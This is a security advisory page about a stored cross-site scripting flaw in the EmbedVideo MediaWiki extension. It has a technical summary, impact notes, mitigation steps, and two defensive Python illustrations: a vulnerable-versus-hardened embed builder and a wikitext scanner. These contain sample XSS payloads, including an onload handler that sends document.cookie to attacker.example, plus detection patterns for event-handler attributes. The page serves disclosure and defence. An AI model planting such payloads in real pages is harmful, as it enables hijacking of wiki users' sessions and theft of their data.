CVE-2025-59839: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in StarCitizenWiki mediawiki-extensions-EmbedVideo
Description
The EmbedVideo Extension is a MediaWiki extension which adds a parser function called #ev and various parser tags for embedding video clips from various video sharing services. In versions 4.0.0 and prior, the EmbedVideo extension allows adding arbitrary attributes to an HTML element, allowing for stored XSS through wikitext. This issue has been patched via commit 4e075d3.
AI Analysis
Technical Summary
CVE-2025-59839 is a high-severity stored cross-site scripting (XSS) vulnerability in the EmbedVideo extension for MediaWiki, versions 4.0.0 and prior. The advisory is published by the StarCitizenWiki project, which maintains the extension's repository (mediawiki-extensions-EmbedVideo); the extension itself is used by many MediaWiki sites, not only that wiki. EmbedVideo provides the #ev parser function and several parser tags for embedding video clips from video sharing platforms in wiki pages. The weakness (CWE-79) is that the extension lets wikitext supply arbitrary attributes on the HTML element it generates for an embed, instead of restricting attribute names to an allowlist and escaping their values. Because any attribute name is accepted, an editor can set one that the browser treats as script, such as an inline event handler. The payload is saved with the page and runs in the browser of every subsequent viewer, in the wiki's own origin, so it can read page content, issue authenticated API requests in the viewer's session, and perform wiki actions on the viewer's behalf.

Planting the payload requires the ability to save wikitext containing the #ev call: on wikis that allow anonymous editing this needs no account, otherwise it needs an account with edit rights. A victim only has to view the affected page. The CVSS 3.1 base score of 8.6 reflects the metrics recorded for the entry: network attack vector, low attack complexity, no privileges required, no user interaction, high confidentiality impact, and low integrity and availability impact. The issue is fixed in commit 4e075d3 of the extension's repository. No exploitation in the wild has been reported, but stored XSS in a widely installed wiki extension is a significant risk for any installation still on a vulnerable version.
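The attribute-injection pattern just described, as an added illustration (this is not the EmbedVideo extension's code): a naive embed builder that copies wikitext-supplied key=value pairs straight into an iframe tag, beside a hardened builder that allowlists attribute names, restricts the source to https URLs and HTML-escapes attribute values. The parameter syntax, the allowed attribute names, the video.example URL and the payload are constructed for the example; the page does not say which #ev parameter accepted the injected attributes in the real extension.

```python
import html
from typing import Dict, Tuple

# Added illustration of the CWE-79 pattern behind CVE-2025-59839: an embed
# builder that copies wikitext-supplied key=value pairs into an HTML tag,
# beside an allowlisting version. NOT the EmbedVideo extension's code; the
# parameter syntax, attribute names and sample payload are constructed.

ALLOWED_ATTRS = frozenset({"width", "height", "title", "class", "allowfullscreen"})
ALLOWED_SRC_SCHEMES = ("https://",)


def parse_attr_params(raw: str) -> Dict[str, str]:
    """Split a '|'-separated parameter string into key=value pairs (constructed helper)."""
    attrs: Dict[str, str] = {}
    for part in raw.split("|"):
        if "=" in part:
            key, _, value = part.partition("=")
            attrs[key.strip()] = value.strip()
    return attrs


def build_iframe_vulnerable(src: str, extra: Dict[str, str]) -> str:
    """Naive builder: every caller-supplied attribute lands in the tag unchecked.
    A key such as 'onload' becomes an inline event handler, i.e. stored XSS."""
    attr_str = " ".join(f'{k}="{v}"' for k, v in extra.items())
    return f'<iframe src="{src}" {attr_str}></iframe>'


def is_safe_src(src: str) -> bool:
    """Accept only absolute https embed sources; rejects javascript:, data: and relative URLs."""
    return src.lower().startswith(ALLOWED_SRC_SCHEMES)


def build_iframe_hardened(src: str, extra: Dict[str, str]) -> str:
    """Allowlist attribute names, drop everything else (including every on* handler),
    and escape attribute values so a quote in a permitted value cannot open a new attribute."""
    if not is_safe_src(src):
        raise ValueError(f"refusing non-https embed source: {src!r}")
    parts = [f'src="{html.escape(src, quote=True)}"']
    for key, value in extra.items():
        name = key.strip().lower()
        if name not in ALLOWED_ATTRS:
            continue  # unknown attribute names are discarded, not passed through
        parts.append(f'{name}="{html.escape(value, quote=True)}"')
    return "<iframe " + " ".join(parts) + "></iframe>"


def demo() -> Tuple[str, str]:
    """Run both builders on a constructed payload; returns (vulnerable, hardened) markup."""
    src = "https://video.example/embed/abc123"  # placeholder host, not a real service
    params = parse_attr_params(
        'width=640|height=360|onload=alert(document.cookie)|title=" onmouseover="alert(1)'
    )
    return build_iframe_vulnerable(src, params), build_iframe_hardened(src, params)


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print("vulnerable:", vulnerable)
    print("hardened:  ", hardened)
```

In the vulnerable output both the `onload` attribute and the quote-terminated `title` value become live attributes; the hardened output keeps only `width`, `height` and `title`, with the embedded quote rendered as `&quot;` so the browser sees one title attribute and no handler. Allowlisting names is the important half: escaping alone would still let an `onload` key through.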
Potential Impact
For European organizations, this vulnerability poses a substantial risk, especially for those operating public-facing or internal MediaWiki-based knowledge bases or documentation portals that use the EmbedVideo extension. A stored payload runs with the privileges of whoever views the page. MediaWiki marks its session cookies HttpOnly by default, so outright cookie theft is unlikely; the realistic outcome is script that reads internal documentation and issues authenticated API requests in the victim's session, including fetching CSRF tokens, so it can edit pages, change settings or act as an administrator who views the page. Organizations in sectors such as government, finance, healthcare, and critical infrastructure, which often rely on MediaWiki for collaborative documentation, could face reputational damage, regulatory penalties under GDPR for data breaches, and operational disruptions. On wikis that allow anonymous editing, no account is needed to plant the payload, which makes remote exploitation straightforward. Additionally, embedded video content is common in modern documentation, increasing the likelihood that this extension is deployed and thus the exposure risk.
Mitigation Recommendations
European organizations should audit their MediaWiki installations for the EmbedVideo extension and its version (Special:Version lists installed extensions and their versions). If version 4.0.0 or earlier is installed, upgrade to a release that contains commit 4e075d3. If an upgrade is not immediately feasible, disable the extension temporarily by removing or commenting out its wfLoadExtension( 'EmbedVideo' ) line in LocalSettings.php; existing embeds stop rendering until it is re-enabled. Reduce who can plant a payload: if the wiki allows anonymous editing, consider turning it off with $wgGroupPermissions['*']['edit'] = false; in LocalSettings.php, and on sensitive wikis keep edit rights limited to trusted accounts. Enable MediaWiki's Content Security Policy support ($wgCSPHeader) to limit what injected script can do; a CSP only blocks inline event handlers and javascript: URLs if it omits 'unsafe-inline', so trial it with $wgCSPReportOnlyHeader first, because some extensions depend on inline scripts. Review recent changes and page histories for #ev calls carrying unexpected parameters, in particular on...= event-handler attributes or javascript: URLs, and after upgrading confirm that such parameters no longer reach the rendered HTML. Conduct security awareness training so wiki administrators and editors recognize and report suspicious embeds. Finally, keep MediaWiki core and all extensions current with security patches to mitigate similar vulnerabilities.
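An added helper for the review step above (not part of MediaWiki or of the extension): scan exported wikitext for #ev calls whose parameters carry event-handler attributes, javascript: URLs or other script-bearing content. The sample wikitext, hostnames and video ids are constructed. Because the page does not identify which parameter accepted the injected attributes, every parameter of every call is inspected, and the pattern also matches any sibling parser function sharing the #ev prefix (an assumption about the extension's naming).

```python
import re
from typing import Dict, List

# Added detection helper: flag #ev parser-function calls in wikitext whose
# parameters look like attribute or URL injection. Not part of the extension
# or of MediaWiki. The sample text, hostnames and video ids are constructed.

SAMPLE_WIKITEXT = """
== Overview ==
{{#ev:youtube|abc123|640|center|Intro clip}}
Some prose between embeds.
{{#ev:youtube|abc123|640|center|Clip|frame|autoplay=1|onload=fetch('https://attacker.example/?c='+document.cookie)}}
{{#ev:vimeo|12345|480|left|Plain description|container=frame}}
{{#ev:youtube|xyz789|640|center|javascript:alert(1)}}
"""

# Matches {{#ev:...}} and, as an assumption, any sibling function with the #ev
# prefix. Nested {{...}} inside a call is not handled: the first '}}' ends the match.
EV_CALL_RE = re.compile(r"\{\{\s*#ev[a-z]*\s*:(.*?)\}\}", re.IGNORECASE | re.DOTALL)

# Indicators that a parameter is trying to smuggle script via an attribute or URL.
SUSPICIOUS = [
    ("event-handler attribute", re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)),
    ("javascript: URL", re.compile(r"javascript\s*:", re.IGNORECASE)),
    ("data:text/html URL", re.compile(r"data\s*:\s*text/html", re.IGNORECASE)),
    ("srcdoc attribute", re.compile(r"\bsrcdoc\s*=", re.IGNORECASE)),
    ("raw markup characters", re.compile(r"[<>]")),
]


def scan_wikitext(text: str) -> List[Dict[str, object]]:
    """Return one finding per (call, reason) with the 1-based line number,
    the reason, and the call's parameter text for a reviewer to inspect."""
    findings: List[Dict[str, object]] = []
    for match in EV_CALL_RE.finditer(text):
        line_no = text.count("\n", 0, match.start()) + 1
        params = match.group(1)
        for reason, pattern in SUSPICIOUS:
            if pattern.search(params):
                findings.append({"line": line_no, "reason": reason, "params": params.strip()})
    return findings


def scan_sample() -> List[Dict[str, object]]:
    """Scan the constructed sample; expected to flag the onload and javascript: calls only."""
    return scan_wikitext(SAMPLE_WIKITEXT)


if __name__ == "__main__":
    for finding in scan_sample():
        print(f"line {finding['line']}: {finding['reason']}: {finding['params']}")
```

Feed it the page text itself, for example from the API's revisions query or from a Special:Export dump after XML-unescaping, since an XML dump entity-encodes angle brackets and the raw-markup rule would otherwise miss them. Treat hits as review items rather than verdicts: a video description can legitimately contain the letters "on" before an equals sign, and the event-handler rule is deliberately broad.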
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Italy, Spain, Poland
Technical Details
- Data Version: 5.1
- Assigner Short Name: GitHub_M
- Date Reserved: 2025-09-22T14:34:03.471Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 68d5511823f14e593ee333b6
Added to database: 9/25/2025, 2:26:32 PM
Last enriched: 9/25/2025, 2:26:49 PM
Last updated: 10/7/2025, 1:41:13 PM